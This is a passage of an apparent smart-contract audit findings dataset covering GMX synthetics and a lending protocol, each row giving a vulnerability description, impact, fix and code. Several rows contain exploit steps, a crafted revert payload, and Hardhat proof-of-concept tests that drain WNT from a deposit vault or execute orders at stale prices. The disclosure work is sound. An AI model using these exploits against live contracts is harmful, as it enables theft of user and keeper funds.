Now after 1 year they owe 100 USDC on their loan and the repay the loan. Since 100 USDC is the minimum, each of the 10 provisions will get their minimal interest. 90 USDC will go to their provisions and 10 will go to the legitimate user who loaned them a majority of the USDC. 
Their APR is ~1.2% which is ~1/9th of what they specified.",The relative size of the provisions should be enforced so that one is not much larger than any other one,Legitimate users can be cheated out of interest owed,"```\\nfunction sendInterests(Loan storage loan, Provision storage provision) internal returns (uint256 sent) {\\n uint256 interests = loan.payment.paid - loan.lent;\\n if (interests == loan.payment.minInterestsToRepay) {\\n // this is the case if the loan is repaid shortly after issuance\\n // each lender gets its minimal interest, as an anti ddos measure to spam offer\\n sent = provision.amount + (interests / loan.nbOfPositions);\\n } else {\\n /* provision.amount / lent = share of the interests belonging to the lender. The parenthesis make the\\n calculus in the order that maximizes precison */\\n sent = provision.amount + (interests * (provision.amount)) / loan.lent;\\n }\\n loan.assetLent.checkedTransfer(msg.sender, sent);\\n}\\n```\\n" +minOfferCost can be bypassed in certain scenarios,medium,"minOfferCost is designed to prevent spam loan requests that can cause the lender to have positions that cost more gas to claim than interest. Due to how interest is calculated right after this minimum is passed it is still possible for the lender to receive less than the minimum.\\nClaimFacet.sol#L94-L106\\n```\\nfunction sendInterests(Loan storage loan, Provision storage provision) internal returns (uint256 sent) {\\n uint256 interests = loan.payment.paid - loan.lent;\\n if (interests == loan.payment.minInterestsToRepay) {\\n // this is the case if the loan is repaid shortly after issuance\\n // each lender gets its minimal interest, as an anti ddos measure to spam offer\\n sent = provision.amount + (interests / loan.nbOfPositions);\\n } else {\\n /* provision.amount / lent = share of the interests belonging to the lender. 
The parenthesis make the\\n calculus in the order that maximizes precison */\\n sent = provision.amount + (interests * (provision.amount)) / loan.lent; <- audit-issue minimal interest isn't guaranteed\\n }\\n loan.assetLent.checkedTransfer(msg.sender, sent);\\n}\\n```\\n\\nWhen a loan has generated more than the minimum interest amount the method for calculating the interest paid is different and depending on the size of the provisions it may lead to provisions that are under the guaranteed minimum.\\nExample: Assume the minimum interest is 1e18. A loan is filled with 2 provisions. The first provision is 25% and the second is 75%. Since there are two loans the total minimum interest for the loan is 2e18. After some time the paid interest reaches 2.001e18 and the loan is paid back. Since it is above the minimum interest rate, it is paid out proportionally. This gives 0.5e18 to the first provision and 1.5e18 to the second provision. This violates the minimum guaranteed interest amount.","Minimum interest should be set based on the percentage of the lowest provision and provision shouldn't be allowed to be lower than some amount. Since this problem occurs when the percentage is less than 1/n (where n is the number of provisions), any single provision should be allowed to be lower than 1/(2n).",Minimum interest guarantee can be violated,"```\\nfunction sendInterests(Loan storage loan, Provision storage provision) internal returns (uint256 sent) {\\n uint256 interests = loan.payment.paid - loan.lent;\\n if (interests == loan.payment.minInterestsToRepay) {\\n // this is the case if the loan is repaid shortly after issuance\\n // each lender gets its minimal interest, as an anti ddos measure to spam offer\\n sent = provision.amount + (interests / loan.nbOfPositions);\\n } else {\\n /* provision.amount / lent = share of the interests belonging to the lender. 
The parenthesis make the\\n calculus in the order that maximizes precison */\\n sent = provision.amount + (interests * (provision.amount)) / loan.lent; <- audit-issue minimal interest isn't guaranteed\\n }\\n loan.assetLent.checkedTransfer(msg.sender, sent);\\n}\\n```\\n" +Incomplete error handling causes execution and freezing/cancelling of Deposits/Withdrawals/Orders to fail.,high,"Users can define callbacks for Deposits/Withdrawals/Orders execution and cancellations. GMX protocol attempts to manage errors during the execution of the callbacks\\nA user controlled callback can return a specially crafted revert reason that will make the error handling revert.\\nBy making the execution and cancelation revert, a malicious actor can game orders and waste keeper gas.\\nThe bug resides in ErrorUtilss `getRevertMessage` that is called on every callback attempt. Example of deposit callback:\\n```\\ntry IDepositCallbackReceiver(deposit.callbackContract()).afterDepositExecution{ gas: deposit.callbackGasLimit() }(key, deposit) {\\n } catch (bytes memory reasonBytes) {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n emit AfterDepositExecutionError(key, deposit, reason, reasonBytes);\\n }\\n```\\n\\nAs can be seen in the above above snippets, the `reasonBytes` from the catch statement is passed to `getRevertMessage` which tries to extract the `Error(string)` message from the revert. The issue is that the data extracted from the revert can be crafted to revert on `abi.decode`.\\nI will elaborate: Correct (expected) revert data looks as follows: 1st 32 bytes: 0x000..64 (bytes memory size) 2nd 32 bytes: 0x08c379a0 (Error(string) selector) 3rd 32 bytes: offset to data 4th 32 bytes: length of data 5th 32 bytes: data\\n`abi.decode` reverts if the data is not structure correctly. 
There can be two reasons for revert:\\nif the 3rd 32 bytes (offset to data) is larger than the uint64 (0xffffffffffffffff)\\nSimplified yul: `if gt(offset, 0xffffffffffffffff) { revert }`\\nif the 3rd 32 bytes (offset to data) is larger than the uint64 of the encoded data, the call will revert\\nSimplified yul: `if iszero(slt(add(offset, 0x1f), size) { revert }`\\nBy reverting with the following data in the callback, the `getRevertMessage` will revert: 0x000....64 0x08c379a0...000 0xffffffffffffffff....000 0x000...2 0x4141","When parsing the revert reason, validate the offsets are smaller than the length of the encoding.","There are two impacts that will occur when the error handling reverts:\\n(1) Orders can be gamed\\nSince the following callbacks are controlled by the user:\\n`afterOrderExecution`\\n`afterOrderCancellation`\\n`afterOrderFrozen`\\nThe user can decide when to send the malformed revert data and when not. Essentially preventing keepers from freezing orders and from executing orders until it fits the attacker.\\nThere are two ways to game the orders:\\nAn attacker can create a risk free order, by setting a long increase order. If the market increases in his favor, he can decide to ""unblock"" the execution and receive profit. If the market decreases, he can cancel the order or wait for the right timing.\\nAn attacker can create a limit order with a size larger than what is available in the pool. The attacker waits for the price to hit and then deposit into the pool to make the transaction work. This method is supposed to be prevented by freezing orders, but since the attacker can make the `freezeOrder` revert, the scenario becomes vulnerable again.\\n(2) drain keepers funds\\nSince exploiting the bug for both execution and cancellation, keepers will ALWAYS revert when trying to execute Deposits/Withdrawals/Orders. The protocol promises to always pay keepers at least the execution cost. 
By making the execution and cancellations revert the Deposits/Withdrawals/Orders will never be removed from the store and keepers transactions will keep reverting until potentially all their funds are wasted.","```\\ntry IDepositCallbackReceiver(deposit.callbackContract()).afterDepositExecution{ gas: deposit.callbackGasLimit() }(key, deposit) {\\n } catch (bytes memory reasonBytes) {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n emit AfterDepositExecutionError(key, deposit, reason, reasonBytes);\\n }\\n```\\n" +Keeper can make deposits/orders/withdrawals fail and receive fee+rewards,medium,"Malicious keeper can make execution of deposits/orders/withdrawals fail by providing limited gas to the execution.\\nIf enough gas is sent for the cancellation to succeed but for the execution to fail the keeper is able to receive the execution fee + incentive rewards and cancel all deposits/orders/withdrawals.\\n```\\nfunction executeDeposit(\\n bytes32 key,\\n OracleUtils.SetPricesParams calldata oracleParams\\n ) external\\n globalNonReentrant\\n onlyOrderKeeper\\n withOraclePrices(oracle, dataStore, eventEmitter, oracleParams)\\n {\\n uint256 startingGas = gasleft();\\n\\n try this._executeDeposit(\\n key,\\n oracleParams,\\n msg.sender,\\n startingGas\\n ) {\\n } catch (bytes memory reasonBytes) {\\n _handleDepositError(\\n key,\\n startingGas,\\n reasonBytes\\n );\\n }\\n }\\n```\\n\\nFor the attack to succeed, the keeper needs to make `this._executeDeposit` revert. 
Due to the 64/63 rule the attack will succeed if both of the following conditions meet:\\n63/64 of the supplied gas will cause an out of gas in the `try` statement\\n1/64 of the supplied gas is enough to execute the `catch` statement.\\nConsidering `2000000` is the max callback limit and native token transfer gas limit is large enough to support contracts the above conditions can be met.",Add a buffer of gas that needs to be supplied to the execute function to make sure the `try` statement will not revert because of out of gas.,Keeper can remove all deposits/withdrawals/orders from the protocol.\\nEssentially stealing all execution fees paid\\nKeeper can create deposits and by leveraging the bug can cancel them when executing while receiving rewards.\\nVaults will be drained,"```\\nfunction executeDeposit(\\n bytes32 key,\\n OracleUtils.SetPricesParams calldata oracleParams\\n ) external\\n globalNonReentrant\\n onlyOrderKeeper\\n withOraclePrices(oracle, dataStore, eventEmitter, oracleParams)\\n {\\n uint256 startingGas = gasleft();\\n\\n try this._executeDeposit(\\n key,\\n oracleParams,\\n msg.sender,\\n startingGas\\n ) {\\n } catch (bytes memory reasonBytes) {\\n _handleDepositError(\\n key,\\n startingGas,\\n reasonBytes\\n );\\n }\\n }\\n```\\n" +WNT in depositVault can be drained by abusing initialLongToken/initialShortToken of CreateDepositParams,high,"The attacker can abuse the initialLongToken/initialShortToken of `CreateDepositParams` to drain all the WNT from depositVault.\\n```\\n function createDeposit(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n DepositVault depositVault,\\n address account,\\n CreateDepositParams memory params\\n ) external returns (bytes32) {\\n Market.Props memory market = MarketUtils.getEnabledMarket(dataStore, params.market);\\n\\n uint256 initialLongTokenAmount = depositVault.recordTransferIn(params.initialLongToken);\\n uint256 initialShortTokenAmount = 
depositVault.recordTransferIn(params.initialShortToken);\\n\\n address wnt = TokenUtils.wnt(dataStore);\\n\\n if (market.longToken == wnt) {\\n initialLongTokenAmount -= params.executionFee;\\n } else if (market.shortToken == wnt) {\\n initialShortTokenAmount -= params.executionFee;\\n```\\n\\nThe `initialLongToken` and `initialShortToken` of `CreateDepositParams` can be set to any token address and there is no check for the `initialLongToken` and `initialShortToken` during `createDeposit`. The attacker can set initialLongToken/initialShortToken to a token(USDC e.g.) with less value per unit than WNT and for a market with `market.longToken == wnt` or `market.shortToken == wnt`, `params.executionFee` will be wrongly subtracted from `initialLongTokenAmount` or `initialLongTokenAmount`. This allows the attacker to have a controllable large `params.executionFee` by sending tokens with less value. By calling `cancelDeposit`, `params.executionFee` amount of WNT will be repaid to the attacker.\\nHere is a PoC test case that drains WNT from depositVault:\\n```\\ndiff --git a/gmx-synthetics/test/router/ExchangeRouter.ts b/gmx-synthetics/test/router/ExchangeRouter.ts\\nindex 7eca238..c40a71c 100644\\n--- a/gmx-synthetics/test/router/ExchangeRouter.ts\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/gmx-synthetics/test/router/ExchangeRouter.ts\\n@@ -103,6 // Add the line below\\n103,82 @@ describe(""ExchangeRouter"", () => {\\n });\\n });\\n \\n// Add the line below\\n it(""createDepositPoC"", async () => {\\n// Add the line below\\n // simulate normal user deposit\\n// Add the line below\\n await usdc.mint(user0.address, expandDecimals(50 * 1000, 6));\\n// Add the line below\\n await usdc.connect(user0).approve(router.address, expandDecimals(50 * 1000, 6));\\n// Add the line below\\n const tx = await exchangeRouter.connect(user0).multicall(\\n// Add the line below\\n [\\n// Add the line below\\n 
exchangeRouter.interface.encodeFunctionData(""sendWnt"", [depositVault.address, expandDecimals(11, 18)]),\\n// Add the line below\\n exchangeRouter.interface.encodeFunctionData(""sendTokens"", [\\n// Add the line below\\n usdc.address,\\n// Add the line below\\n depositVault.address,\\n// Add the line below\\n expandDecimals(50 * 1000, 6),\\n// Add the line below\\n ]),\\n// Add the line below\\n exchangeRouter.interface.encodeFunctionData(""createDeposit"", [\\n// Add the line below\\n {\\n// Add the line below\\n receiver: user0.address,\\n// Add the line below\\n callbackContract: user2.address,\\n// Add the line below\\n market: ethUsdMarket.marketToken,\\n// Add the line below\\n initialLongToken: ethUsdMarket.longToken,\\n// Add the line below\\n initialShortToken: ethUsdMarket.shortToken,\\n// Add the line below\\n longTokenSwapPath: [ethUsdMarket.marketToken, ethUsdSpotOnlyMarket.marketToken],\\n// Add the line below\\n shortTokenSwapPath: [ethUsdSpotOnlyMarket.marketToken, ethUsdMarket.marketToken],\\n// Add the line below\\n minMarketTokens: 100,\\n// Add the line below\\n shouldUnwrapNativeToken: true,\\n// Add the line below\\n executionFee,\\n// Add the line below\\n callbackGasLimit: ""200000"",\\n// Add the line below\\n },\\n// Add the line below\\n ]),\\n// Add the line below\\n ],\\n// Add the line below\\n { value: expandDecimals(11, 18) }\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n // depositVault has WNT balance now\\n// Add the line below\\n let vaultWNTBalance = await wnt.balanceOf(depositVault.address);\\n// Add the line below\\n expect(vaultWNTBalance.eq(expandDecimals(11, 18)));\\n// Add the line below\\n\\n// Add the line below\\n // user1 steal WNT from depositVault\\n// Add the line below\\n await usdc.mint(user1.address, vaultWNTBalance.add(1));\\n// Add the line below\\n await usdc.connect(user1).approve(router.address, vaultWNTBalance.add(1));\\n// Add the line below\\n\\n// Add the line 
below\\n // Step 1. create deposit with malicious initialLongToken\\n// Add the line below\\n await exchangeRouter.connect(user1).multicall(\\n// Add the line below\\n [\\n// Add the line below\\n exchangeRouter.interface.encodeFunctionData(""sendTokens"", [\\n// Add the line below\\n usdc.address,\\n// Add the line below\\n depositVault.address,\\n// Add the line below\\n vaultWNTBalance.add(1),\\n// Add the line below\\n ]),\\n// Add the line below\\n exchangeRouter.interface.encodeFunctionData(""createDeposit"", [\\n// Add the line below\\n {\\n// Add the line below\\n receiver: user1.address,\\n// Add the line below\\n callbackContract: user2.address,\\n// Add the line below\\n market: ethUsdMarket.marketToken,\\n// Add the line below\\n initialLongToken: usdc.address, // use usdc instead of WNT\\n// Add the line below\\n initialShortToken: ethUsdMarket.shortToken,\\n// Add the line below\\n longTokenSwapPath: [],\\n// Add the line below\\n shortTokenSwapPath: [],\\n// Add the line below\\n minMarketTokens: 0,\\n// Add the line below\\n shouldUnwrapNativeToken: true,\\n// Add the line below\\n executionFee: vaultWNTBalance,\\n// Add the line below\\n callbackGasLimit: ""0"",\\n// Add the line below\\n },\\n// Add the line below\\n ]),\\n// Add the line below\\n ],\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n // Step 2. 
cancel deposit to drain WNT\\n// Add the line below\\n const depositKeys = await getDepositKeys(dataStore, 0, 2);\\n// Add the line below\\n // const deposit = await reader.getDeposit(dataStore.address, depositKeys[1]);\\n// Add the line below\\n // console.log(deposit);\\n// Add the line below\\n // console.log(depositKeys[1]);\\n// Add the line below\\n await expect(exchangeRouter.connect(user1).cancelDeposit(depositKeys[1]));\\n// Add the line below\\n\\n// Add the line below\\n // WNT is drained from depositVault\\n// Add the line below\\n expect(await wnt.balanceOf(depositVault.address)).eq(0);\\n// Add the line below\\n });\\n// Add the line below\\n\\n it(""createOrder"", async () => {\\n const referralCode = hashString(""referralCode"");\\n await usdc.mint(user0.address, expandDecimals(50 * 1000, 6));\\n```\\n","```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/gmx// Remove the line below\\nsynthetics/contracts/deposit/DepositUtils.sol b/gmx// Remove the line below\\nsynthetics/contracts/deposit/DepositUtils.sol\\nindex fae1b46..2811a6d 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/gmx// Remove the line below\\nsynthetics/contracts/deposit/DepositUtils.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/gmx// Remove the line below\\nsynthetics/contracts/deposit/DepositUtils.sol\\n@@ // Remove the line below\\n74,9 // Add the line below\\n74,9 @@ library DepositUtils {\\n \\n address wnt = TokenUtils.wnt(dataStore);\\n \\n// Remove the line below\\n if (market.longToken == wnt) {\\n// Add the line below\\n if (params.initialLongToken == wnt) {\\n initialLongTokenAmount // Remove the line below\\n= params.executionFee;\\n// Remove the line below\\n } else if (market.shortToken == wnt) {\\n// Add the line below\\n } else if (params.initialShortToken == wnt) {\\n initialShortTokenAmount // Remove the line below\\n= params.executionFee;\\n } else {\\n uint256 
wntAmount = depositVault.recordTransferIn(wnt);\\n```\\n",The malicious user can drain all WNT from depositVault.,"```\\n function createDeposit(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n DepositVault depositVault,\\n address account,\\n CreateDepositParams memory params\\n ) external returns (bytes32) {\\n Market.Props memory market = MarketUtils.getEnabledMarket(dataStore, params.market);\\n\\n uint256 initialLongTokenAmount = depositVault.recordTransferIn(params.initialLongToken);\\n uint256 initialShortTokenAmount = depositVault.recordTransferIn(params.initialShortToken);\\n\\n address wnt = TokenUtils.wnt(dataStore);\\n\\n if (market.longToken == wnt) {\\n initialLongTokenAmount -= params.executionFee;\\n } else if (market.shortToken == wnt) {\\n initialShortTokenAmount -= params.executionFee;\\n```\\n" +Incorrect function call leads to stale borrowing fees,high,"Due to an incorrect function call while getting the total borrow fees, the returned fees will be an inaccurate and stale amount. Which will have an impact on liquidity providers\\nAs said the function getTotalBorrowingFees:\\n```\\nfunction getTotalBorrowingFees(DataStore dataStore, address market, address longToken, address shortToken, bool isLong) internal view returns (uint256) {\\n uint256 openInterest = getOpenInterest(dataStore, market, longToken, shortToken, isLong);\\n uint256 cumulativeBorrowingFactor = getCumulativeBorrowingFactor(dataStore, market, isLong);\\n uint256 totalBorrowing = getTotalBorrowing(dataStore, market, isLong);\\n return openInterest * cumulativeBorrowingFactor - totalBorrowing;\\n}\\n```\\n\\ncalculates the fess by calling getCumulativeBorrowingFactor(...):\\nwhich is the wrong function to call because it returns a stale borrowing factor. 
To get the actual borrowing factor and calculate correctly the borrowing fees, GMX should call the `getNextCumulativeBorrowingFactor` function:\\nWhich makes the right calculation, taking into account the stale fees also:\\n```\\n uint256 durationInSeconds = getSecondsSinceCumulativeBorrowingFactorUpdated(dataStore, market.marketToken, isLong);\\n uint256 borrowingFactorPerSecond = getBorrowingFactorPerSecond(\\n dataStore,\\n market,\\n prices,\\n isLong\\n );\\n\\n uint256 cumulativeBorrowingFactor = getCumulativeBorrowingFactor(dataStore, market.marketToken, isLong);\\n\\n uint256 delta = durationInSeconds * borrowingFactorPerSecond;\\n uint256 nextCumulativeBorrowingFactor = cumulativeBorrowingFactor + delta;\\n return (nextCumulativeBorrowingFactor, delta);\\n```\\n","In order to mitigate the issue, call the function `getNextCumulativeBorrowingFactor` instead of the function `getCumulativeBorrowingFactor()` for a correct accounting and not getting stale fees","As fee calculation will not be accurate, liquidity providers will have a less-worth token because pending fees are not accounted in the pool's value","```\\nfunction getTotalBorrowingFees(DataStore dataStore, address market, address longToken, address shortToken, bool isLong) internal view returns (uint256) {\\n uint256 openInterest = getOpenInterest(dataStore, market, longToken, shortToken, isLong);\\n uint256 cumulativeBorrowingFactor = getCumulativeBorrowingFactor(dataStore, market, isLong);\\n uint256 totalBorrowing = getTotalBorrowing(dataStore, market, isLong);\\n return openInterest * cumulativeBorrowingFactor - totalBorrowing;\\n}\\n```\\n" +Limit orders can be used to get a free look into the future,high,"Users can continually update their orders to get a free look into prices in future blocks\\nOrder execution relies on signed archived prices from off-chain oracles, where each price is stored along with the block range it applies to, and limit orders are only allowed to execute with oracle 
prices where the block is greater than the block in which the order was last updated. Since prices are required to be future prices, there is a time gap between when the last signed price was archived, and the new price for the next block is stored in the archive, and the order keeper is able to fetch it and submit an execution for it in the next block.\\nThe example given by the sponsor in discord was:\\n```\\nthe oracle process:\\n\\n1. the oracle node checks the latest price from reference exchanges and stores it with the oracle node's timestamp, e.g. time: 1000\\n2. the oracle node checks the latest block of the blockchain, e.g. block 100, it stores this with the oracle node's timestamp as well\\n3. the oracle node signs minOracleBlockNumber: 100, maxOracleBlockNumber: 100, timestamp: 1000, price: \\n4. the next time the loop runs is at time 1001, if the latest block of the blockchain is block 105, e.g. if 5 blocks were produced in that one second, then the oracle would sign\\nminOracleBlockNumber: 101, maxOracleBlockNumber: 105, timestamp: 1001, price: \\n```\\n","Require a delay between when the order was last increased/submitted, and when an update is allowed, similar to REQUEST_EXPIRATION_BLOCK_AGE for the cancellation of market orders","If a user has a pending exit order that was submitted a block N, and the user sees that the price at block N+1 will be more favorable, they can update their exit order, changing the amount by +/- 1 wei, and have the order execution delayed until the next block, at which point they can decided again whether the price and or impact is favorable, and whether to exit. In the sponsor's example, if the order was submitted at block 101, they have until block 105 to decide whether to update their order, since the order execution keeper won't be able to do the execution until block 106. 
There is a gas cost for doing such updates, but if the position is large enough, or the price is gapping enough, it is worth while to do this, especially if someone comes up with an automated service that does this on your behalf.\\nThe more favorable price for the attacker is at the expense of the other side of the trade, and is a loss of capital for them.","```\\nthe oracle process:\\n\\n1. the oracle node checks the latest price from reference exchanges and stores it with the oracle node's timestamp, e.g. time: 1000\\n2. the oracle node checks the latest block of the blockchain, e.g. block 100, it stores this with the oracle node's timestamp as well\\n3. the oracle node signs minOracleBlockNumber: 100, maxOracleBlockNumber: 100, timestamp: 1000, price: \\n4. the next time the loop runs is at time 1001, if the latest block of the blockchain is block 105, e.g. if 5 blocks were produced in that one second, then the oracle would sign\\nminOracleBlockNumber: 101, maxOracleBlockNumber: 105, timestamp: 1001, price: \\n```\\n" +Creating an order of type MarketIncrease opens an attack vector where attacker can execute txs with stale prices by inputting a very extense swapPath,high,"The vulnerability relies on the create order function:\\n```\\n function createOrder(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n OrderVault orderVault,\\n IReferralStorage referralStorage,\\n address account,\\n BaseOrderUtils.CreateOrderParams memory params\\n ) external returns (bytes32) {\\n ReferralUtils.setTraderReferralCode(referralStorage, account, params.referralCode);\\n\\n uint256 initialCollateralDeltaAmount;\\n\\n address wnt = TokenUtils.wnt(dataStore);\\n\\n bool shouldRecordSeparateExecutionFeeTransfer = true;\\n\\n if (\\n params.orderType == Order.OrderType.MarketSwap ||\\n params.orderType == Order.OrderType.LimitSwap ||\\n params.orderType == Order.OrderType.MarketIncrease ||\\n params.orderType == Order.OrderType.LimitIncrease\\n ) {\\n 
initialCollateralDeltaAmount = orderVault.recordTransferIn(params.addresses.initialCollateralToken);\\n if (params.addresses.initialCollateralToken == wnt) {\\n if (initialCollateralDeltaAmount < params.numbers.executionFee) {\\n revert InsufficientWntAmountForExecutionFee(initialCollateralDeltaAmount, params.numbers.executionFee);\\n }\\n initialCollateralDeltaAmount -= params.numbers.executionFee;\\n shouldRecordSeparateExecutionFeeTransfer = false;\\n }\\n } else if (\\n params.orderType == Order.OrderType.MarketDecrease ||\\n params.orderType == Order.OrderType.LimitDecrease ||\\n params.orderType == Order.OrderType.StopLossDecrease\\n ) {\\n initialCollateralDeltaAmount = params.numbers.initialCollateralDeltaAmount;\\n } else {\\n revert OrderTypeCannotBeCreated(params.orderType);\\n }\\n\\n if (shouldRecordSeparateExecutionFeeTransfer) {\\n uint256 wntAmount = orderVault.recordTransferIn(wnt);\\n if (wntAmount < params.numbers.executionFee) {\\n revert InsufficientWntAmountForExecutionFee(wntAmount, params.numbers.executionFee);\\n }\\n\\n GasUtils.handleExcessExecutionFee(\\n dataStore,\\n orderVault,\\n wntAmount,\\n params.numbers.executionFee\\n );\\n }\\n\\n // validate swap path markets\\n MarketUtils.getEnabledMarkets(\\n dataStore,\\n params.addresses.swapPath\\n );\\n\\n Order.Props memory order;\\n\\n order.setAccount(account);\\n order.setReceiver(params.addresses.receiver);\\n order.setCallbackContract(params.addresses.callbackContract);\\n order.setMarket(params.addresses.market);\\n order.setInitialCollateralToken(params.addresses.initialCollateralToken);\\n order.setSwapPath(params.addresses.swapPath);\\n order.setOrderType(params.orderType);\\n order.setDecreasePositionSwapType(params.decreasePositionSwapType);\\n order.setSizeDeltaUsd(params.numbers.sizeDeltaUsd);\\n order.setInitialCollateralDeltaAmount(initialCollateralDeltaAmount);\\n order.setTriggerPrice(params.numbers.triggerPrice);\\n 
order.setAcceptablePrice(params.numbers.acceptablePrice);\\n order.setExecutionFee(params.numbers.executionFee);\\n order.setCallbackGasLimit(params.numbers.callbackGasLimit);\\n order.setMinOutputAmount(params.numbers.minOutputAmount);\\n order.setIsLong(params.isLong);\\n order.setShouldUnwrapNativeToken(params.shouldUnwrapNativeToken);\\n\\n ReceiverUtils.validateReceiver(order.receiver());\\n\\n if (order.initialCollateralDeltaAmount() == 0 && order.sizeDeltaUsd() == 0) {\\n revert BaseOrderUtils.EmptyOrder();\\n }\\n\\n CallbackUtils.validateCallbackGasLimit(dataStore, order.callbackGasLimit());\\n\\n uint256 estimatedGasLimit = GasUtils.estimateExecuteOrderGasLimit(dataStore, order);\\n GasUtils.validateExecutionFee(dataStore, estimatedGasLimit, order.executionFee());\\n\\n bytes32 key = NonceUtils.getNextKey(dataStore);\\n\\n order.touch();\\n OrderStoreUtils.set(dataStore, key, order);\\n\\n OrderEventUtils.emitOrderCreated(eventEmitter, key, order);\\n\\n return key;\\n}\\n```\\n\\nSpecifically, on a marketIncrease OrderType. 
Executing an order type of marketIncrease opens an attack path where you can execute transactions with stale prices.\\nThe way to achieve this, is by creating a market increase order and passing a very extensive swapPath in params:\\n```\\n BaseOrderUtils.CreateOrderParams memory params\\n\\n\\n struct CreateOrderParams {\\n CreateOrderParamsAddresses addresses;\\n CreateOrderParamsNumbers numbers;\\n Order.OrderType orderType;\\n Order.DecreasePositionSwapType decreasePositionSwapType;\\n bool isLong;\\n bool shouldUnwrapNativeToken;\\n bytes32 referralCode;\\n }\\n\\n struct CreateOrderParamsAddresses {\\n address receiver;\\n address callbackContract;\\n address market;\\n address initialCollateralToken;\\n address[] swapPath; //HEREE <--------------------------------------------------------\\n }\\n\\nThe swap path has to be as long as it gets close to the gasLimit of the block.\\n```\\n\\nAfter calling marketIncrease close to gasLimit then using the callback contract that you passed as a param in:\\nan exceeding the block.gasLimit in the callback.\\nAfter ""x"" amount of blocks, change the gasUsage on the fallback, just that the transaction executes at the prior price.\\nPoC on how to execute the transaction with old pricing:\\n```\\nimport { expect } from ""chai"";\\nimport { mine } from ""@nomicfoundation/hardhat-network-helpers"";\\nimport { OrderType, getOrderCount, getOrderKeys, createOrder, executeOrder, handleOrder } from ""../utils/order"";\\nimport { expandDecimals, decimalToFloat } from ""../utils/math"";\\nimport { deployFixture } from ""../utils/fixture"";\\n import { handleDeposit } from ""../utils/deposit"";\\nimport { getPositionCount, getAccountPositionCount } from ""../utils/position"";\\n\\ndescribe(""Execute transaction with all prices"", () => {\\nlet 
fixture,\\nuser0,\\nuser1,\\nuser2,\\nreader,\\ndataStore,\\nethUsdMarket,\\nethUsdSpotOnlyMarket,\\nwnt,\\nusdc,\\nattackContract,\\noracle,\\ndepositVault,\\nexchangeRouter,\\nswapHandler,\\nexecutionFee;\\n\\n beforeEach(async () => {\\n fixture = await deployFixture();\\n\\n ({ user0, user1, user2 } = fixture.accounts);\\n ({\\n reader,\\n dataStore,\\n oracle,\\n depositVault,\\n ethUsdMarket,\\n ethUsdSpotOnlyMarket,\\n wnt,\\n usdc,\\n attackContract,\\n exchangeRouter,\\n swapHandler,\\n } = fixture.contracts);\\n ({ executionFee } = fixture.props);\\n\\n await handleDeposit(fixture, {\\n create: {\\n market: ethUsdMarket,\\n longTokenAmount: expandDecimals(10000000, 18),\\n shortTokenAmount: expandDecimals(10000000 * 5000, 6),\\n },\\n });\\n await handleDeposit(fixture, {\\n create: {\\n market: ethUsdSpotOnlyMarket,\\n longTokenAmount: expandDecimals(10000000, 18),\\n shortTokenAmount: expandDecimals(10000000 * 5000, 6),\\n },\\n });\\n });\\n\\n it(""Old price order execution"", async () => {\\n const path = [];\\n const UsdcBal = expandDecimals(50 * 1000, 6);\\n expect(await getOrderCount(dataStore)).eq(0);\\n\\n for (let i = 0; i < 63; i++) {\\n if (i % 2 == 0) path.push(ethUsdMarket.marketToken);\\n else path.push(ethUsdSpotOnlyMarket.marketToken);\\n }\\n\\n const params = {\\n account: attackContract,\\n callbackContract: attackContract,\\n callbackGasLimit: 1900000,\\n market: ethUsdMarket,\\n minOutputAmount: 0,\\n initialCollateralToken: usdc, // Collateral will get swapped to ETH by the swapPath -- 50k/$5k = 10 ETH Collateral\\n initialCollateralDeltaAmount: UsdcBal,\\n swapPath: path,\\n sizeDeltaUsd: decimalToFloat(200 * 1000), // 4x leverage -- position size is 40 ETH\\n acceptablePrice: expandDecimals(5001, 12),\\n orderType: OrderType.MarketIncrease,\\n isLong: true,\\n shouldUnwrapNativeToken: false,\\n gasUsageLabel: ""createOrder"",\\n };\\n\\n // Create a MarketIncrease order that will run out of gas doing callback\\n await 
createOrder(fixture, params);\\n expect(await getOrderCount(dataStore)).eq(1);\\n expect(await getAccountPositionCount(dataStore, attackContract.address)).eq(0);\\n expect(await getPositionCount(dataStore)).eq(0);\\n expect(await getAccountPositionCount(dataStore, attackContract.address)).eq(0);\\n\\n await expect(executeOrder(fixture)).to.be.reverted;\\n\\n await mine(50);\\n\\n await attackContract.flipSwitch();\\n\\n expect(await getOrderCount(dataStore)).eq(1);\\n\\n await executeOrder(fixture, {\\n minPrices: [expandDecimals(5000, 4), expandDecimals(1, 6)],\\n maxPrices: [expandDecimals(5000, 4), expandDecimals(1, 6)],\\n });\\n\\n expect(await getOrderCount(dataStore)).eq(0);\\n expect(await getAccountPositionCount(dataStore, attackContract.address)).eq(1);\\n expect(await getPositionCount(dataStore)).eq(1);\\n\\n await handleOrder(fixture, {\\n create: {\\n account: attackContract,\\n market: ethUsdMarket,\\n initialCollateralToken: wnt,\\n initialCollateralDeltaAmount: 0,\\n sizeDeltaUsd: decimalToFloat(200 * 1000),\\n acceptablePrice: 6001,\\n orderType: OrderType.MarketDecrease,\\n isLong: true,\\n gasUsageLabel: ""orderHandler.createOrder"",\\n swapPath: [ethUsdMarket.marketToken],\\n },\\n execute: {\\n minPrices: [expandDecimals(6000, 4), expandDecimals(1, 6)],\\n maxPrices: [expandDecimals(6000, 4), expandDecimals(1, 6)],\\n gasUsageLabel: ""orderHandler.executeOrder"",\\n },\\n });\\n\\n const WNTAfter = await wnt.balanceOf(attackContract.address);\\n const UsdcAfter = await usdc.balanceOf(attackContract.address);\\n\\n expect(UsdcAfter).to.gt(\\n expandDecimals(100 * 1000, 6)\\n .mul(999)\\n .div(1000)\\n );\\n expect(UsdcAfter).to.lt(\\n expandDecimals(100 * 1000, 6)\\n .mul(1001)\\n .div(1000)\\n );\\n expect(WNTAfter).to.eq(0);\\n }).timeout(100000);\\n```\\n","There need to be a way to cap the length of the path to control user input:\\nuint y = 10; require(swapPath.length < y ,""path too long"");",The attack would allow to make free 